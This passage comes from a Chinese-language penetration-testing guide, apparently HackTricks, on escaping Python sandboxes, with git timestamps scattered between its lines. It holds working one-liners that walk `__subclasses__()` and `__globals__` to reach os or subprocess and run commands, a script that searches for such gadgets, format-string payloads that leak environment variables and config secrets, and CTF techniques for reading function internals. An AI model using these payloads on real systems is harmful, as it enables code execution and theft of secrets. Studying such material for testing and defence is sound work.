2021-06-25 13:39:46 +00:00
2024-03-09 13:16:16 +00:00
例如,知道使用库 ** `sys` ** 可以**导入任意库**,你可以搜索所有**已加载的模块中导入了 sys 的模块**:
2021-06-24 23:53:47 +00:00
```python
[ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ]
['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', 'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations']
```
2024-03-09 13:16:16 +00:00
有很多,而**我们只需要一个**来执行命令:
2021-06-24 23:53:47 +00:00
```python
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")
```
2024-02-06 04:10:34 +00:00
我们可以使用**其他已知可用于执行命令的库**来执行相同的操作:
2021-06-24 23:53:47 +00:00
```python
#os
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" in x.__init__.__globals__ ][0]["os"].system("ls")
2021-10-06 00:19:16 +00:00
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" == x.__init__.__globals__["__name__"] ][0]["system"]("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls')
#subprocess
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "subprocess" == x.__init__.__globals__["__name__"] ][0]["Popen"]("ls")
[ x for x in ''.__class__.__base__.__subclasses__() if "'subprocess." in str(x) ][0]['Popen']('ls')
[ x for x in ''.__class__.__base__.__subclasses__() if x.__name__ == 'Popen' ][0]('ls')
#builtins
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "__bultins__" in x.__init__.__globals__ ]
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"].__import__("os").system("ls")
#sys
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'_sitebuiltins." in str(x) and not "_Helper" in str(x) ][0]["sys"].modules["os"].system("ls")
2021-06-24 23:53:47 +00:00
#commands (not very common)
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "commands" in x.__init__.__globals__ ][0]["commands"].getoutput("ls")
2021-10-06 00:19:16 +00:00
2021-06-24 23:53:47 +00:00
#pty (not very common)
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pty" in x.__init__.__globals__ ][0]["pty"].spawn("ls")
2021-10-06 00:19:16 +00:00
2021-06-24 23:53:47 +00:00
#importlib
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].import_module("os").system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].__import__("os").system("ls")
2021-10-06 00:19:16 +00:00
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].import_module("os").system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].__import__("os").system("ls")
#pdb
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pdb" in x.__init__.__globals__ ][0]["pdb"].os.system("ls")
2021-06-24 23:53:47 +00:00
```
2024-02-06 04:10:34 +00:00
此外,我们甚至可以搜索加载恶意库的模块:
2021-06-24 23:53:47 +00:00
```python
2021-10-06 00:19:16 +00:00
bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
2021-06-24 23:53:47 +00:00
for b in bad_libraries_names:
2023-08-03 19:12:22 +00:00
vuln_libs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and b in x.__init__.__globals__ ]
print(f"{b}: {', '.join(vuln_libs)}")
2021-06-24 23:53:47 +00:00
"""
os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations
2023-08-03 19:12:22 +00:00
commands:
2021-06-24 23:53:47 +00:00
subprocess: BaseDependency, Origin, Version, Package
2023-08-03 19:12:22 +00:00
pty:
2021-06-24 23:53:47 +00:00
importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path
2023-08-03 19:12:22 +00:00
imp:
2021-06-24 23:53:47 +00:00
sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close
builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature
2021-10-06 00:19:16 +00:00
pdb:
2021-06-24 23:53:47 +00:00
"""
```
2024-03-09 13:16:16 +00:00
此外,如果您认为**其他库**可能能够**调用函数来执行命令**,我们还可以通过**过滤可能库中的函数名称**来进行筛选:
2021-06-24 23:53:47 +00:00
```python
2021-10-06 00:19:16 +00:00
bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
2021-06-25 13:52:40 +00:00
bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"]
2021-06-24 23:53:47 +00:00
for b in bad_libraries_names + bad_func_names:
2023-08-03 19:12:22 +00:00
vuln_funcs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) for k in x.__init__.__globals__ if k == b ]
print(f"{b}: {', '.join(vuln_funcs)}")
2021-06-24 23:53:47 +00:00
"""
os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations
2023-08-03 19:12:22 +00:00
commands:
2021-06-24 23:53:47 +00:00
subprocess: BaseDependency, Origin, Version, Package
2023-08-03 19:12:22 +00:00
pty:
2021-06-24 23:53:47 +00:00
importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path
2023-08-03 19:12:22 +00:00
imp:
2021-06-24 23:53:47 +00:00
sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close
builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature
2021-10-06 00:19:16 +00:00
pip:
pdb:
2021-06-24 23:53:47 +00:00
system: _wrap_close, _wrap_close
getstatusoutput: CompletedProcess, Popen
getoutput: CompletedProcess, Popen
call: CompletedProcess, Popen
Popen: CompletedProcess, Popen
2023-08-03 19:12:22 +00:00
spawn:
import_module:
2021-06-24 23:53:47 +00:00
__import__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec
load_source: NullImporter, _HackedGetData
2023-08-03 19:12:22 +00:00
execfile:
execute:
2021-06-24 23:53:47 +00:00
__builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, DynamicClassAttribute, _GeneratorWrapper, WarningMessage, catch_warnings, Repr, partialmethod, singledispatchmethod, cached_property, _GeneratorContextManagerBase, _BaseExitStack, Completer, State, SubPattern, Tokenizer, Scanner, Untokenizer, FrameSummary, TracebackException, _IterationGuard, WeakSet, _RLock, Condition, Semaphore, Event, Barrier, Thread, CompletedProcess, Popen, finalize, _TemporaryFileCloser, _TemporaryFileWrapper, SpooledTemporaryFile, TemporaryDirectory, NullImporter, _HackedGetData, DOMBuilder, DOMInputSource, NamedNodeMap, TypeInfo, ReadOnlySequentialNamedNodeMap, ElementInfo, Template, Charset, Header, _ValueFormatter, _localized_month, _localized_day, Calendar, different_locale, AddrlistClass, _PolicyBase, BufferedSubFile, FeedParser, Parser, BytesParser, Message, HTTPConnection, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, Address, Group, HeaderRegistry, ContentManager, CompressedValue, _Feature, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, Queue, _PySimpleQueue, HMAC, Timeout, Retry, HTTPConnection, MimeTypes, RequestField, RequestMethods, DeflateDecoder, GzipDecoder, MultiDecoder, ConnectionPool, CharSetProber, CodingStateMachine, CharDistributionAnalysis, JapaneseContextAnalysis, UniversalDetector, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, DSAParameterNumbers, DSAPublicNumbers, DSAPrivateNumbers, ObjectIdentifier, ECDSA, EllipticCurvePublicNumbers, EllipticCurvePrivateNumbers, RSAPrivateNumbers, RSAPublicNumbers, DERReader, BestAvailableEncryption, CBC, XTS, OFB, CFB, CFB8, CTR, GCM, Cipher, _CipherContext, _AEADCipherContext, AES, Camellia, TripleDES, Blowfish, CAST5, ARC4, IDEA, SEED, ChaCha20, _FragList, _SSHFormatECDSA, Hash, SHAKE128, SHAKE256, BLAKE2b, BLAKE2s, NameAttribute, RelativeDistinguishedName, Name, RFC822Name, DNSName, UniformResourceIdentifier, DirectoryName, RegisteredID, IPAddress, OtherName, Extensions, CRLNumber, AuthorityKeyIdentifier, SubjectKeyIdentifier, AuthorityInformationAccess, SubjectInformationAccess, AccessDescription, BasicConstraints, DeltaCRLIndicator, CRLDistributionPoints, FreshestCRL, DistributionPoint, PolicyConstraints, CertificatePolicies, PolicyInformation, UserNotice, NoticeReference, ExtendedKeyUsage, TLSFeature, InhibitAnyPolicy, KeyUsage, NameConstraints, Extension, GeneralNames, SubjectAlternativeName, IssuerAlternativeName, CertificateIssuer, CRLReason, InvalidityDate, PrecertificateSignedCertificateTimestamps, SignedCertificateTimestamps, OCSPNonce, IssuingDistributionPoint, UnrecognizedExtension, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _OpenSSLError, Binding, _X509NameInvalidator, PKey, _EllipticCurve, X509Name, X509Extension, X509Req, X509, X509Store, X509StoreContext, Revoked, CRL, PKCS12, NetscapeSPKI, _PassphraseHelper, _CallbackExceptionHelper, Context, Connection, _CipherContext, _CMACContext, _X509ExtensionParser, DHPrivateNumbers, DHPublicNumbers, DHParameterNumbers, _DHParameters, _DHPrivateKey, _DHPublicKey, Prehashed, _DSAVerificationContext, _DSASignatureContext, _DSAParameters, _DSAPrivateKey, _DSAPublicKey, _ECDSASignatureContext, _ECDSAVerificationContext, _EllipticCurvePrivateKey, _EllipticCurvePublicKey, _Ed25519PublicKey, _Ed25519PrivateKey, _Ed448PublicKey, _Ed448PrivateKey, _HashContext, _HMACContext, _Certificate, _RevokedCertificate, _CertificateRevocationList, _CertificateSigningRequest, _SignedCertificateTimestamp, OCSPRequestBuilder, _SingleResponse, OCSPResponseBuilder, _OCSPResponse, _OCSPReq
```
2024-02-06 04:10:34 +00:00
## 递归搜索内置函数、全局变量...
2021-10-06 00:19:16 +00:00
{% hint style="warning" %}
2024-02-06 04:10:34 +00:00
这真是**太棒了**。如果你正在**寻找像globals、builtins、open或任何其他对象**,只需使用这个脚本**递归地查找可以找到该对象的位置**。
2021-10-06 00:19:16 +00:00
{% endhint %}
```python
2021-10-06 10:13:49 +00:00
import os, sys # Import these to find more gadgets
2021-10-06 09:54:56 +00:00
2021-10-06 00:19:16 +00:00
SEARCH_FOR = {
2023-08-03 19:12:22 +00:00
# Misc
"__globals__": set(),
"builtins": set(),
"__builtins__": set(),
"open": set(),
# RCE libs
"os": set(),
"subprocess": set(),
"commands": set(),
"pty": set(),
"importlib": set(),
"imp": set(),
"sys": set(),
"pip": set(),
"pdb": set(),
# RCE methods
"system": set(),
"popen": set(),
"getstatusoutput": set(),
"getoutput": set(),
"call": set(),
"Popen": set(),
"popen": set(),
"spawn": set(),
"import_module": set(),
"__import__": set(),
"load_source": set(),
"execfile": set(),
"execute": set()
2021-10-06 00:19:16 +00:00
}
2022-09-12 21:12:49 +00:00
#More than 4 is very time consuming
2021-10-06 00:19:16 +00:00
MAX_CONT = 4
2022-09-12 21:12:49 +00:00
#The ALREADY_CHECKED makes the script run much faster, but some solutions won't be found
2021-10-06 00:19:16 +00:00
#ALREADY_CHECKED = set()
def check_recursive(element, cont, name, orig_n, orig_i, execute):
2023-08-03 19:12:22 +00:00
# If bigger than maximum, stop
if cont > MAX_CONT:
return
# If already checked, stop
#if name and name in ALREADY_CHECKED:
# return
# Add to already checked
#if name:
# ALREADY_CHECKED.add(name)
# If found add to the dict
for k in SEARCH_FOR:
if k in dir(element) or (type(element) is dict and k in element):
SEARCH_FOR[k].add(f"{orig_i}: {orig_n}.{name}")
# Continue with the recursivity
for new_element in dir(element):
try:
check_recursive(getattr(element, new_element), cont+1, f"{name}.{new_element}", orig_n, orig_i, execute)
# WARNING: Calling random functions sometimes kills the script
# Comment this part if you notice that behaviour!!
if execute:
try:
if callable(getattr(element, new_element)):
check_recursive(getattr(element, new_element)(), cont+1, f"{name}.{new_element}()", orig_i, execute)
except:
pass
except:
pass
# If in a dict, scan also each key, very important
if type(element) is dict:
for new_element in element:
check_recursive(element[new_element], cont+1, f"{name}[{new_element}]", orig_n, orig_i)
2021-10-06 00:19:16 +00:00
def main():
2023-08-03 19:12:22 +00:00
print("Checking from empty string...")
total = [""]
for i,element in enumerate(total):
print(f"\rStatus: {i}/{len(total)}", end="")
cont = 1
check_recursive(element, cont, "", str(element), f"Empty str {i}", True)
print()
print("Checking loaded subclasses...")
total = "".__class__.__base__.__subclasses__()
for i,element in enumerate(total):
print(f"\rStatus: {i}/{len(total)}", end="")
cont = 1
check_recursive(element, cont, "", str(element), f"Subclass {i}", True)
print()
print("Checking from global functions...")
total = [print, check_recursive]
for i,element in enumerate(total):
print(f"\rStatus: {i}/{len(total)}", end="")
cont = 1
check_recursive(element, cont, "", str(element), f"Global func {i}", False)
print()
print(SEARCH_FOR)
2021-10-06 00:19:16 +00:00
if __name__ == "__main__":
2023-08-03 19:12:22 +00:00
main()
2021-10-06 00:19:16 +00:00
```
2024-03-09 13:16:16 +00:00
你可以在此页面上检查此脚本的输出:
2021-10-06 10:13:49 +00:00
2024-03-09 13:16:16 +00:00
{% content-ref url="broken-reference/" %}
[broken-reference ](broken-reference/ )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-10-06 10:13:49 +00:00
2024-02-06 04:10:34 +00:00
## Python格式化字符串
2021-10-06 00:19:16 +00:00
2024-03-09 13:16:16 +00:00
如果你向Python发送一个将要被格式化的字符串, 你可以使用 `{}` 来访问Python的内部信息。你可以使用之前的示例来访问全局变量或内置函数。
2021-10-06 09:50:35 +00:00
{% hint style="info" %}
2024-03-09 13:16:16 +00:00
然而,有一个限制,你只能使用符号 `.[]` ,所以你将无法执行任意代码,只能读取信息。\
_**如果你知道如何通过这个漏洞执行代码,请与我联系。**_
2021-10-06 09:50:35 +00:00
{% endhint %}
```python
# Example from https://www.geeksforgeeks.org/vulnerability-in-str-format-in-python/
CONFIG = {
2023-08-03 19:12:22 +00:00
"KEY": "ASXFYFGK78989"
2021-10-06 09:50:35 +00:00
}
class PeopleInfo:
2023-08-03 19:12:22 +00:00
def __init__ (self, fname, lname):
self.fname = fname
self.lname = lname
2021-10-06 09:50:35 +00:00
def get_name_for_avatar(avatar_str, people_obj):
2023-08-03 19:12:22 +00:00
return avatar_str.format(people_obj = people_obj)
2021-10-06 09:50:35 +00:00
people = PeopleInfo('GEEKS', 'FORGEEKS')
st = "{people_obj.__init__.__globals__[CONFIG][KEY]}"
get_name_for_avatar(st, people_obj = people)
```
2024-03-09 13:16:16 +00:00
注意如何可以用**点**的方式像`people_obj.__init__`一样正常访问属性,以及用**括号**而不带引号的方式访问**字典元素**`__globals__[CONFIG]`
2021-10-06 09:50:35 +00:00
2024-03-09 13:16:16 +00:00
还要注意可以使用`.__dict__`来枚举对象的元素`get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)`
2021-10-06 12:43:31 +00:00
2024-03-09 13:16:16 +00:00
格式字符串的一些其他有趣特性是通过添加**`!s`**、**`!r`**、**`!a`**分别在指定对象中执行**`str`**、**`repr`**和**`ascii`**函数的可能性:
2021-10-06 12:43:31 +00:00
```python
st = "{people_obj.__init__.__globals__[CONFIG][KEY]!a}"
get_name_for_avatar(st, people_obj = people)
```
2024-02-06 04:10:34 +00:00
此外,还可以在类中**编写新的格式化程序**:
2021-10-06 12:43:31 +00:00
```python
class HAL9000(object):
2023-08-03 19:12:22 +00:00
def __format__ (self, format):
if (format == 'open-the-pod-bay-doors'):
return "I'm afraid I can't do that."
return 'HAL 9000'
2021-10-06 12:43:31 +00:00
'{:open-the-pod-bay-doors}'.format(HAL9000())
#I'm afraid I can't do that.
```
2024-02-06 04:10:34 +00:00
**更多关于格式化字符串的示例**可以在[https://pyformat.info/](https://pyformat.info)找到。
2021-10-06 12:43:31 +00:00
2023-06-06 22:57:49 +00:00
{% hint style="danger" %}
2024-02-06 04:10:34 +00:00
还要检查以下页面, 其中包含从Python内部对象中**读取敏感信息**的小工具:
2023-06-06 22:57:49 +00:00
{% endhint %}
{% content-ref url="../python-internal-read-gadgets.md" %}
[python-internal-read-gadgets.md ](../python-internal-read-gadgets.md )
{% endcontent-ref %}
2024-02-06 04:10:34 +00:00
### 敏感信息泄露有效载荷
2021-10-06 09:50:35 +00:00
```python
{whoami.__class__.__dict__}
{whoami.__globals__[os].__dict__}
{whoami.__globals__[os].environ}
{whoami.__globals__[sys].path}
{whoami.__globals__[sys].modules}
# Access an element through several links
{whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__}
```
2023-12-30 22:37:12 +00:00
## 解剖 Python 对象
2021-10-06 00:19:16 +00:00
2021-10-06 14:43:31 +00:00
{% hint style="info" %}
2024-03-09 13:16:16 +00:00
如果您想深入了解 **Python 字节码** ,请阅读这篇关于该主题的**精彩**文章:[**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d)
2021-10-06 14:43:31 +00:00
{% endhint %}
2020-07-15 15:43:14 +00:00
2024-03-09 13:16:16 +00:00
在一些 CTF 比赛中,您可能会收到一个**自定义函数的名称,其中包含标志**,您需要查看**函数**的**内部**以提取它。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
这是要检查的函数:
2020-07-15 15:43:14 +00:00
```python
def get_flag(some_input):
2023-08-03 19:12:22 +00:00
var1=1
var2="secretcode"
var3=["some","array"]
if some_input == var2:
return "THIS-IS-THE-FALG!"
else:
return "Nope"
2020-07-15 15:43:14 +00:00
```
2024-02-06 04:10:34 +00:00
#### dir
2023-12-30 22:37:12 +00:00
#### dir
2020-07-15 15:43:14 +00:00
```python
dir() #General dir() to find what we have loaded
['__builtins__', '__doc__', '__name__', '__package__', 'b', 'bytecode', 'code', 'codeobj', 'consts', 'dis', 'filename', 'foo', 'get_flag', 'names', 'read', 'x']
dir(get_flag) #Get info tof the function
['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']
```
2024-02-06 04:10:34 +00:00
#### 全局变量
2020-07-15 15:43:14 +00:00
2024-03-09 13:16:16 +00:00
`__globals__` 和 `func_globals` (相同)获取全局环境。在示例中,您可以看到一些导入的模块,一些全局变量及其声明的内容:
2020-07-15 15:43:14 +00:00
```python
get_flag.func_globals
get_flag.__globals__
{'b': 3, 'names': ('open', 'read'), '__builtins__': < module ' __builtin__ ' ( built-in ) > , 'codeobj': < code object < module > at 0x7f58c00b26b0, file "noname", line 1>, 'get_flag': < function get_flag at 0x7f58c00b27d0 > , 'filename': './poc.py', '__package__': None, 'read': < function read at 0x7f58c00b23d0 > , 'code': < type ' code ' > , 'bytecode': 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S', 'consts': (None, './poc.py', 'r'), 'x': < unbound method catch_warnings . __init__ > , '__name__': '__main__', 'foo': < function foo at 0x7f58c020eb50 > , '__doc__': None, 'dis': < module ' dis ' from '/ usr / lib / python2 . 7 / dis . pyc ' > }
#If you have access to some variable value
CustomClassObject.__class__.__init__.__globals__
```
2023-08-03 19:12:22 +00:00
### **访问函数代码**
2020-07-15 15:43:14 +00:00
2024-02-06 04:10:34 +00:00
**`__code__`** 和 `func_code` : 您可以访问函数的这个属性来获取函数的代码对象。
2020-07-15 15:43:14 +00:00
```python
2021-10-06 13:23:46 +00:00
# In our current example
get_flag.__code__
< code object get_flag at 0x7f9ca0133270 , file " < stdin > ", line 1
# Compiling some python code
compile("print(5)", "", "single")
< code object < module > at 0x7f9ca01330c0, file "", line 1>
2022-09-12 21:12:49 +00:00
#Get the attributes of the code object
2021-10-06 13:23:46 +00:00
dir(get_flag.__code__)
2020-07-15 15:43:14 +00:00
['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames']
2021-10-06 13:23:46 +00:00
```
2023-08-03 19:12:22 +00:00
### 获取代码信息
2021-10-06 13:23:46 +00:00
```python
2022-05-01 12:41:36 +00:00
# Another example
2021-10-06 13:23:46 +00:00
s = '''
a = 5
b = 'text'
def f(x):
2023-08-03 19:12:22 +00:00
return x
2021-10-06 13:23:46 +00:00
f(5)
'''
c=compile(s, "", "exec")
2021-10-06 15:44:17 +00:00
# __doc__: Get the description of the function, if any
print.__doc__
2021-10-06 13:23:46 +00:00
# co_consts: Constants
get_flag.__code__.co_consts
2020-07-15 15:43:14 +00:00
(None, 1, 'secretcode', 'some', 'array', 'THIS-IS-THE-FALG!', 'Nope')
2021-10-06 13:23:46 +00:00
c.co_consts #Remember that the exec mode in compile() generates a bytecode that finally returns None.
(5, 'text', < code object f at 0x7f9ca0133540 , file " " , line 4 > , 'f', None
# co_names: Names used by the bytecode which can be global variables, functions, and classes or also attributes loaded from objects.
get_flag.__code__.co_names
()
c.co_names
('a', 'b', 'f')
#co_varnames: Local names used by the bytecode (arguments first, then the local variables)
get_flag.__code__.co_varnames
('some_input', 'var1', 'var2', 'var3')
#co_cellvars: Nonlocal variables These are the local variables of a function accessed by its inner functions.
get_flag.__code__.co_cellvars
()
#co_freevars: Free variables are the local variables of an outer function which are accessed by its inner function.
get_flag.__code__.co_freevars
()
2020-07-15 15:43:14 +00:00
#Get bytecode
2021-10-06 13:23:46 +00:00
get_flag.__code__.co_code
2020-07-15 15:43:14 +00:00
